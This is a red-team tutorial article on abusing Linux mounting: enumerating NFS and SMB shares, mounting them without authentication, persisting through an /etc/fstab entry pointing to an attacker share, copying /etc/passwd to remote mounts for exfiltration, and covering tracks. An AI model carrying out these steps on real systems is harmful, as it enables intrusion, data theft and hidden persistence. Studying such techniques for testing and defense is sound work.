Mounting Devices and Shares in Linux: A Red Team Perspective
In Linux, mounting is the process of attaching a filesystem, device, or network share to a specific directory so that it becomes accessible to the system and its users. While mounting is a fundamental administrative task, it is also a powerful weapon in the hands of a red teamer. By leveraging mounts, adversaries can persist data, exfiltrate files, or even extend control across systems without raising immediate suspicion.
This article explores how mounting devices and shares can be used offensively in red team operations. We will discuss reconnaissance, exploitation, and persistence techniques while showcasing code samples for hands-on practice.
Understanding the Basics of Mounting
On a typical Linux system, devices such as hard drives, USB sticks, and remote network shares (via protocols like NFS, CIFS/SMB, or SSHFS) can be mounted onto directories. The standard mount command follows the format:
mount -t <filesystem_type> <device_or_share> <mount_point>For instance, mounting a USB drive formatted as ext4 might look like this:
sudo mount -t ext4 /dev/sdb1 /mnt/usbFrom a red team standpoint, this basic mechanism provides the foundation for manipulating storage, hiding payloads, and staging data for further operations.
Enumerating Mount Points and Shares
Before attempting to mount anything, reconnaissance is critical. Linux systems maintain information about mounted filesystems in /etc/fstab and /proc/mounts.
cat /etc/fstab
cat /proc/mountsReading /etc/fstab can reveal network shares that are automatically mounted at boot. This may point to central file servers or backup systems—a prime target for credential harvesting or data staging.
Additionally, network scanning tools like nmap can help discover accessible NFS or SMB shares:
nmap -p 111,2049 <target> # NFS discovery
nmap -p 139,445 <target> # SMB discoveryCombining host-based enumeration with network discovery provides an attacker with a complete picture of potential mounting opportunities.
Offensive Use of NFS Mounts
Network File System (NFS) is widely used in Unix-like environments, but it is notoriously prone to misconfiguration. Exports with permissive settings can allow adversaries to mount remote directories without authentication.
For example, if an NFS export is discovered:
showmount -e <target>A red teamer could mount it directly:
sudo mount -t nfs <target>:/export /mnt/lootOnce mounted, sensitive data stored in the export is readily available. In poorly configured environments, this may even allow writing files, enabling persistence or lateral movement by planting scripts that execute during system tasks.
Exploiting SMB/CIFS Shares
SMB shares are common in mixed Windows/Linux environments. Tools like smbclient provide enumeration capabilities:
smbclient -L //<target>/ -U guestIf authentication is successful (or not required), the share can be mounted locally:
sudo mount -t cifs //<target>/share /mnt/smb -o username=guest,password=Mounting SMB shares is particularly useful for staging large exfiltration operations. Instead of exfiltrating files over C2 channels, attackers can write them directly to a mounted SMB share for later retrieval.
Leveraging SSHFS for Covert Access
SSHFS allows filesystems to be mounted over SSH, making it a convenient and stealthy option when valid credentials are available. For example:
sshfs user@target:/home/user /mnt/sshfsThis effectively integrates the remote filesystem into the attacker’s local environment. It enables seamless data exfiltration, rapid file transfers, and even persistence if mounted via scripts at boot.
Persistence Through Mounting
Persistence via mounting is a subtle but powerful approach. By modifying /etc/fstab or placing scripts in startup directories, red teamers can ensure remote shares are mounted each time the system boots. For example:
echo "//10.0.0.5/share /mnt/persist cifs username=guest,password=guest 0 0" | sudo tee -a /etc/fstabThis technique ensures that even after reboots, the attacker-controlled share remains mounted. Such persistence is harder to detect than cron jobs or systemd services, as it blends with normal administrative practices.
Data Exfiltration via Mounted Shares
Mounted shares also provide an efficient method for stealthy data exfiltration. Instead of compressing and transmitting files over noisy channels, a red teamer can simply copy data to a mounted NFS, SMB, or SSHFS share:
cp /etc/passwd /mnt/sshfs/
cp -r /var/log /mnt/nfs/The data is silently written to a remote server with minimal network footprint, reducing the chance of detection by security monitoring systems.
Covering Tracks
While mounting can be a strong offensive capability, it leaves traces in logs and system state. /var/log/auth.log may show mounting attempts, and /proc/mounts will reveal active mounts. A disciplined operator must unmount after operations:
umount /mnt/sshfsAnd for stealthier campaigns, it is advisable to use ephemeral mount points within /tmp or user-controlled directories rather than well-known locations like /mnt.
Red Team Tradecraft Considerations
From a red team perspective, mounting provides several strategic advantages:
- Lateral Movement: By exploiting network shares, attackers can pivot across systems without relying on noisy exploits.
- Persistence: Shares mounted at boot or via hidden scripts ensure long-term access.
- Data Staging: Large volumes of data can be exfiltrated with minimal footprint.
- Blending In: Administrators mount devices and shares regularly, making malicious mounts blend with legitimate activity.
However, operators must balance stealth and efficiency. Aggressive mounting of shares can attract attention if not done carefully. Timing, target selection, and cleanup are essential.
Conclusion
Mounting devices and shares in Linux is a fundamental feature for administrators, but in the hands of a red team it becomes a versatile offensive technique. By exploiting NFS and SMB misconfigurations, leveraging SSHFS for stealthy access, and establishing persistence via mounts, attackers can achieve long-term objectives while maintaining a low profile.
For red teamers, understanding the nuances of Linux mounting not only expands operational capabilities but also highlights areas defenders should monitor closely. This knowledge sharpens both offense and defense, making it a critical skill for modern cyber operations.
***
Note on Content Creation: This article was developed with the assistance of generative AI like Gemini or ChatGPT. While all public AI strives for accuracy and comprehensive coverage, all content is reviewed and edited by human experts at IsoSecu to ensure factual correctness, relevance, and adherence to our editorial standards.